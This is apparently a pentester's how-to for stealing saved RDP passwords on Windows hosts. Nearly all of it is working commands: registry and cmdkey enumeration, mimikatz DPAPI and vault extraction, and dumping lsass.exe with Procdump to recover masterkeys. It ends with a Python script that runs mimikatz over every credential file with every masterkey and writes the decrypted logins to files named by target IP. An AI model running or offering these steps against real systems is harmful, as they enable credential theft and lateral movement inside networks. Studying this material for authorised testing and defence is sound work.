Internal network pentesting: recovering locally saved RDP passwords
Obtain the RDP connection history:
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s    // one subkey per host the user connected to, with a UsernameHint value
cmdkey /list    // list the credentials saved in Credential Manager; saved RDP logins appear as TERMSRV/<host>
Extracting on the live host:
mimikatz # privilege::debug
mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\xx    // xx = one of the credential files listed below
Without a key this parses the blob and prints its header, including the guidMasterKey that protects it; to actually decrypt it add /masterkey:<hex> with a masterkey recovered as described in the Masterkey section.
Extracting offline:
Procdump download: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*    // list the credential files (they are hidden, so /a is required); copy them off the host together with the lsass dump
Masterkey:
Dump the lsass.exe process with Procdump (procdump -accepteula -ma lsass.exe lsass.dmp), then load the dump in mimikatz to recover the cached masterkeys:
sekurlsa::minidump lsass.dmp    // switch sekurlsa from the live LSASS to the dump file
sekurlsa::dpapi                 // list the cached masterkeys, each with its GUID
Match the GUID printed by sekurlsa::dpapi against the guidMasterKey shown in the credential blob header, and pass that masterkey to mimikatz to decrypt the credential file:
dpapi::cred /in:<credential file> /masterkey:<hex masterkey>
mimikatz driven from Python to dump credentials automatically    // mainly useful when there are many credential files and several candidate masterkeys, since every file has to be tried against every key
import os
import re

# Directory holding the copied credential files (from %userprofile%\AppData\Local\Microsoft\Credentials)
CRED_DIR = r"C:\Users\admin\Desktop\mimkatz\x64\pinju"
# Masterkeys recovered from the lsass dump with sekurlsa::dpapi (hex)
KEYS = [
    'a8e9e1d02d5bdebd939faa1dd556f428ac9cfc19d68c8e758b2dd2364059c07a7cf8e8cd430d63a7deb628244a96cc52d7e51b03b7ccda5fec461c987c5b0828',
    '8233e316134ace93c883bdf9b01dbc32d49d6d6e91bc1af0c7960247ff7c551fcd706711352d7a398d9e2fa9ab7e786c57fd81404201a1b990d26ee25686a625',
]
# IPv4 pattern: the RDP target shows up in the decrypted TargetName as TERMSRV/<ip>
IP_RE = re.compile(r'(?<![.\d])(?:\d{1,3}\.){3}\d{1,3}(?![.\d])')

os.makedirs('res', exist_ok=True)   # output directory, one file per target IP

for dd in os.listdir(CRED_DIR):
    for i in KEYS:
        # Try every masterkey against every file; only the matching key yields a decrypted **CREDENTIAL** block
        os.system('mimikatz.exe "dpapi::cred /in:{} /masterkey:{}" exit > 1n.txt'.format(os.path.join(CRED_DIR, dd), i))
        with open('1n.txt', 'r', encoding='utf-8', errors='ignore') as f:
            res = f.read()
        if 'TERMSRV' in res:
            names = IP_RE.findall(res)
            print(names)
            # Targets saved by hostname rather than IP have no match; keep them under 'unknown' instead of crashing
            target = names[0] if names else 'unknown'
            with open('./res/' + target + '.txt', 'a+') as d:
                d.write(res)
When mimikatz runs inside the user's own session:
Read the cmdkey credentials directly from the vault, no masterkey handling needed:
privilege::debug
vault::cred /patch
------------